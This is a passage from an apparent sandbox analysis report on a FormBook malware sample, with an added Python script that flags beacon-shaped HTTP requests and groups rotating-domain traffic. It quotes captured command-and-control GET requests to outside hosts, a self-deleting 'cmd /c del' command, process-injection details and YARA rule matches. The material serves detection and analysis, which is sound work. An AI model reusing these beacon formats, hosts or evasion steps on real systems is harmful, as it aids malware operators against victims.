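     "GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxb"
     " HTTP/1.1\r\nHost: www.india-vspakistanlive.com\r\nConnection: close\r\n\r\n"),
    (7, r"C:\Windows\explorer.exe", "192.0.78.25",
     "GET /gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV"
     " HTTP/1.1\r\nHost: www.bloomingintoyou.com\r\nConnection: close\r\n\r\n"),
]

# Shape heuristics. The thresholds are my own choice, not report output: a short
# lowercase path segment, exactly two query parameters of which one is a short
# alphanumeric token and the other a long base64-alphabet blob, Connection: close
# and no User-Agent header at all.
PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")
SHORT_RE = re.compile(r"^[A-Za-z0-9]{8,24}$")
LONG_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
# Windows images that should not originate ad-hoc HTTP GETs. explorer.exe and
# cmmon32.exe are the injected hosts in this report; svchost.exe is my addition.
SYSTEM_IMAGES = {"explorer.exe", "cmmon32.exe", "svchost.exe"}


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, query params and headers.

    The query is split by hand rather than with urllib.parse: parse_qsl would
    turn the '+' inside the blobs into spaces and defeat the base64 check."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    params = []
    for pair in (query.split("&") if query else []):
        key, _, value = pair.partition("=")
        params.append((key, value))
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "params": params, "headers": headers}


def beacon_hits(req):
    """Return the names of the shape indicators one request matches."""
    hits = []
    if req["method"] == "GET" and PATH_RE.match(req["path"]):
        hits.append("short-random-path")
    values = [v for _, v in req["params"]]
    if (len(values) == 2 and any(SHORT_RE.match(v) for v in values)
            and any(LONG_RE.match(v) for v in values)):
        hits.append("short-id+long-blob")
    if req["headers"].get("connection", "").lower() == "close":
        hits.append("connection-close")
    if "user-agent" not in req["headers"]:
        hits.append("no-user-agent")
    return hits


def triage(sessions, min_hits=3):
    """Flag sessions matching the shape and correlate them across hosts.

    The same process sending the same path and the same short parameter value
    to several unrelated hosts is the rotating-domain pattern; the constant
    value is what to pivot on, the individual hosts are not."""
    flagged = []
    groups = defaultdict(set)  # (image, path, key, value) -> set of hosts
    for sid, process, dst_ip, raw in sessions:
        req = parse_request(raw)
        hits = beacon_hits(req)
        image = process.rsplit("\\", 1)[-1].lower()
        if image in SYSTEM_IMAGES:
            hits.append("system-process-http")
        host = req["headers"].get("host", dst_ip)
        if len(hits) >= min_hits:
            flagged.append({"session": sid, "process": image, "host": host,
                            "dst_ip": dst_ip, "hits": hits})
        for key, value in req["params"]:
            if SHORT_RE.match(value):
                groups[(image, req["path"], key, value)].add(host)
    campaigns = [{"process": img, "path": path, "param": f"{key}={value}", "hosts": sorted(hosts)}
                 for (img, path, key, value), hosts in groups.items() if len(hosts) >= 2]
    return flagged, campaigns


if __name__ == "__main__":
    flagged, campaigns = triage(SESSIONS)
    for f in flagged:
        print(f"session {f['session']}: {f['process']} -> {f['host']} ({f['dst_ip']}): {', '.join(f['hits'])}")
    for c in campaigns:
        print(f"rotating-domain beacon: {c['process']} {c['path']} {c['param']} "
              f"across {len(c['hosts'])} hosts: {', '.join(c['hosts'])}")
```

Run against the three sessions, every request scores all five indicators and the correlation step collapses them into one group keyed on explorer.exe, /gzjz/ and Rxo=8pyT5Z4hoPNLSb. In a proxy or NetFlow-plus-HTTP log the same grouping is what separates a beacon rotating through dozens of hosts from three unrelated web requests, which is why the block groups on the constant parameter rather than on Host or destination IP.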


                                                              Code Manipulations

                                                              Statistics

                                                              Behavior

                                                              System Behavior

General

Start time: 09:53:45
Start date: 24/02/2021
Path: C:\Users\user\Desktop\dwg.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\dwg.exe'
Imagebase: 0x400000
File size: 98304 bytes
MD5 hash: 92628CC54AD5D8FFED4F28F9BF9F80F8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Reputation: low

General

Start time: 09:53:57
Start date: 24/02/2021
Path: C:\Users\user\Desktop\dwg.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\dwg.exe'
Imagebase: 0x400000
File size: 98304 bytes
MD5 hash: 92628CC54AD5D8FFED4F28F9BF9F80F8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 09:54:14
Start date: 24/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:54:27
Start date: 24/02/2021
Path: C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\cmmon32.exe
Imagebase: 0x130000
File size: 36864 bytes
MD5 hash: 2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.461717156.00000000026E4000.00000004.00000020.sdmp, Author: Florian Roth
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000A.00000002.463830371.00000000049D7000.00000004.00000001.sdmp, Author: Florian Roth
Reputation: moderate

General

Start time: 09:54:32
Start date: 24/02/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\dwg.exe'
Imagebase: 0xad0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:54:32
Start date: 24/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                              Disassembly

                                                              Code Analysis
